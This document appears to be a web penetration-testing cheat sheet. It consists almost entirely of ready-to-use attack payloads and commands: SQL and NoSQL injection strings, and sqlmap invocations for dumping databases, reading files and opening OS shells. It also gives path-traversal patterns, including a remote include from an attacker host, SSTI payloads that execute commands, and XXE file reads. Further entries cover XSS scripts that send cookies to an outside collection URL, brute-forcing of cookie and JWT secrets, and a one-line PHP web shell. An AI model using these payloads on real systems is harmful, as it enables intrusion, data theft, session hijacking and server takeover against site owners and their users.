Web
Discovery Tool
Some ressources are accessible by the attacker but not referenced by the web application. Discovery tool bruteforce url or domain with wordlist to discover new content.
Wordlist
SecLists Raft Medium
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
SecList DNS
/usr/share/seclists/Discovery/DNS/namelist.txt
Dirbuster Small
/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Dirbuster Small Lowercase
/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
Dirb
/usr/share/dirb/wordlists/common.txt
Extensions
Script
php,js,twig
Text
html,txt,md
Data
json,csv
DB
db,sqlite
Linux
sh,bin
Windows
ps1,exe
Cewl
A tool to create a wordlist from a site.
cewl -d 5 -e --with-numbers http://example.com/
ffuf
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt:FUZZ -u http://url/FUZZ'
Most Popular domain discovery command
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt:FUZZ -u http://url/ -H 'Host: FUZZ.host'
Gobuster
gobuster dir -u <url> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 25 -x html,php
Feroxbuster
(Best one)
feroxbuster -u <url> -e -x html,js,php
Dirb
dirb url -R
GUI
dirbuster
owasp-zap
Nosql Injection
NoSQL databases (aka "not only SQL") are non-tabular databases and store data differently than relational tables. The syntax is different from traditional SQL syntax. Example: Mongo
Common Pattern
' || 1==1 %00
' || 1==1 //
{ $ne: 1 }
true, $where: '1 == 1'
'; return 1 %00
Form
username[$ne]=lol$password[$ne]=lol
username[$regex]=.*$password[$regex]=.*
username[$eq]=admin&password[$eq]=admin
JSON
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$eq": "admin"}, "password": {"$ne": "admin"}}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
SQL Injection
SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. - Source
Interesting cheat sheet of Port Swigger.
Manual
Common pattern
" OR ""="
' OR ''='
' OR 1=1 -- comment
OR 1=1
*
Comment
-- comment
# comment
/* comment */
/*! comment */
INSERT
admin", "") ON DUPLICATE KEY UPDATE password="newpasswd";
Separator
" UNION SELECT * FROM users
" ; SELECT * FROM users
Interesting postgres function
Filter bypass
query_to_xml('SELECT * FROM users', true, false, '')
ts_stat('SELECT * FROM users')::text
Arbitrary read / write
# Read
lo_export(31337, '/etc/passwd')
lo_get(31337)
# Write
lo_from_bytea(31338, decode('bG9saXBvcAo=', 'base64'))
lo_export(31338, '/tmp/lolipop')
SQLmap
SQLmap is a tool that automates the process of detecting and exploiting SQL injection.
Discovery
sqlmap -r req
# If you know info
sqlmap -r req --os <os> --dbms <type db> --technique <tech>
Get DB
# List databases
sqlmap -r req --predict-output --dbs
# List Tables
sqlmap -r req --predict-output --tables -D db
# Dump Table
sqlmap -r req --predict-output --dump -D db -T table
# Dump Column(s)
sqlmap -r req --predict-output --dump -D db -T table -C column
List Privileges
sqlmap -r req --current-user
sqlmap -r req --privileges
sqlmap -r req --roles
File
# Read file
sqlmap -r req --file-read=/etc/passwd
# Upload file
sqlmap -r req --file-write=/local/file --file-dest=/dest/path
Shell
# Upload Reverse shell
sqlmap -r req --os-shell
sqlmap -r req --os-cmd 'echo desbarres'
# Sql Shell
sqlmap -r req --sql-shell
Optimize
-o Turn on all optimization switches
--predict-output Predict common queries output
--keep-alive Use persistent HTTP(s) connections
--null-connection Retrieve page length without actual HTTP response body
--threads=THREADS Max number of concurrent HTTP(s) requests (default 1)
--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
Turbo SQLmap
sqlmap -u 'https://example.com/?arg=*' --dump -T table_example -D example_db --level=2 --force-ssl --time-sec 1 --predict-output --dbms 'MySQL' --technique T --flush-session
Path traversal (LFI)
A path traversal attack aims to access files and directories that are stored outside the web root folder by manipulating variables that reference files. It may be possible to access arbitrary files and directories including application source code or configuration and critical system files.
Pattern
Try to add
%00
at the end of your payload.
..%252f/..%252f/..%252f/..%252f/..%252f/..%252f/..%252f/..%252f/..%252f/%252f/etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%252e%252e%252e%252e%252e%252fetc%252fpasswd%00
../
︰/
..%252f/
..%2f
%2e%2e%2f
%2e%2e/
%2e%2e%5c
..%5c
%252e%252e%255c
..%255c
..%c0%af
PHP pattern
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode/resource=http://attacker.com/reverse.php
php://filter/resource=/etc/passwd
zip://path/to/file.zip%23shell.php
http://attacker.com/reverse.php%00
SSTI
Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely embedding user input in templates enables Server-Side Template Injection. Template Injection can be used to directly attack web servers' internals and often obtain Remote Code Execution (RCE). source
Test
${{<%[%'"}}%\.
{{1+1}}
${1+1}
<%= 1+1 %>
${{1+1}}
#{1+1}
@(1+2)
Nunchucks (Nodejs)
{{range.constructor("console.log(123)")()}}
{{range.constructor("return global.process.mainModule.require('child_process').execSync('id')")()}}
Python (Jinja2)
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
{{request.__class__._load_form_data.__globals__.__builtins__.__import__("os").popen("id").read()}}
Golang
{{.}}
XML external entity (XXE)
XML external entity (XXE) injection is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. - source
Read File
<!DOCTYPE foo [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<foo>Hello &file;</foo>
<!DOCTYPE foo [
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd" >
]>
<foo>Hello &file;</foo>
Get Link
<!DOCTYPE foo [
<!ENTITY file SYSTEM "http://example.com/path">
]>
<foo>Hello &file;</foo>
<!DOCTYPE foo [
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/path">
]>
<foo>Hello &file;</foo>
XSS Injection
XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. source
Script
<script>window.open('https://www.toptal.com/developers/postbin/123-123?' + document.cookie);</script>
<script>document.location = 'https://www.toptal.com/developers/postbin/123-123?' + btoa(document.cookie);</script>
<script>fetch('https://www.toptal.com/developers/postbin/123-123?' + btoa(document.cookie), { method: 'GET',})</script>
<img src=x onerror=alert() />
Meta
<meta http-equiv="refresh" content="0;url=http://example.com">
Object
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
Useful Link
Server Side XSS
Server XSS occurs when untrusted user supplied data is included in an HTTP response generated by the server. In this case, the entire vulnerability is in server-side code, and the browser is simply rendering the response and executing any valid script embedded in it. source
Dynamic PDF
<iframe src=file:///etc/passwd></iframe>
<img src="x" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<link rel=attachment href="file:///etc/passwd">
<object data="file:///etc/passwd">
<portal src="file:///etc/passwd" id="portal">
<svg-dummy></svg-dummy><iframe src='file:///etc/passwd' width='100%' height='1000px'></iframe><svg viewBox='0 0 240 80' height='1000' width='1000' xmlns='http://www.w3.org/2000/svg'><text x='0' y='0' class='Rrrrr' id='demo'>data</text></svg>
<annotation file="/etc/passwd" content="/etc/passwd" icon="graph" title="Attached File: /etc/passwd" pos-x="195" />
Extract annotation
You can extract annotation files with this script:
pip3 install pymupdf
python3 script/get-pdf-annot.py -f "<HTTP(S)_URL> OR <PDF_PATH>"
Cookies
Cookies can be hijack by different way. Sign cookies can be decode to find vulnerable informations or bruteforce to find secret in order to create your own cookies. Other type of cookies need to be steal to hijack session.
Flask
Flask cookies are sign cookie so you can decode it or bruteforce the secret.
Decode
flask-unsign --decode --cookie 'eyJ1c2VyIjoiYWRtaW4ifQ.Y4za7g.ZHmbIsx0-wdFV_IgyWI7MruY9OY'
Bruteforce
flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --no-literal-eval --cookie 'eyJ1c2VyIjoiYWRtaW4ifQ.Y4za7g.ZHmbIsx0-wdFV_IgyWI7MruY9OY'
Encode
flask-unsign --sign --cookie "{'user': 'admin'}" --secret 'mySecret'
Json Web Token (JWT)
A JWT comes in this structure:
AAAAAA.BBBBBB.CCCCCC
. AAAAAA represents the header, BBBBBB represents the payload while CCCCCC represents the signature.The most common algorithms for signing JWTs are:
HMAC + SHA256 (HS256)
RSASSA-PKCS1-v1_5 + SHA256 (RS256)
ECDSA + P-256 + SHA256 ( ES256)
Encode / Decode
Brute Force
jwtcrack "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzb21lIjoicGF5bG9hZCJ9.Fw4maeqOtL8pPwiI2_VzYBo4JQ91P1Ow3X3hNqx2wPg" < words/rockyou.txt
hashcat -r words/hob064.rule words/rockyou.txt --stdout | jwtcrack "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzb21lIjoicGF5bG9hZCJ9.Uzr5ePfZFgmvhMFYJ9WAYISmGLj7JE7SWO43OrfmcZM"
Request
Different tool to make a http request.
Curl
curl 'http://example.com/login' -H 'Content-Type: application/x-www-form-urlencoded' -sd 'username=login&password=pass'
curl -X POST https://example.com/api/submit -H "Content-Type: application/json" -sd '{"email":"lol@lol.com"}'
Python
import requests
# GET
requests.get('http://example.com')
# POST
requests.post('http://example.com/submit',
headers={
'Content-type': 'raw',
},
data={'user': 'guest'},
)
Javascript
// GET
fetch('http://example.com/',{
method: 'GET',
})
// POST
fetch('http://example.com/',{
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({data: 'lol'})
})
Download .git
githacker --url http://url/.git/ --folder result
git-dumper http://url .
CMS
Scaning
wpscan --force update -e --url IP --disable-tls-checks
Certificate
curl <url> --key KEY.key --cert CERT.cert
PhpMyAdmin
Quick Shellcode
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/dir/dir/file.php"
Last updated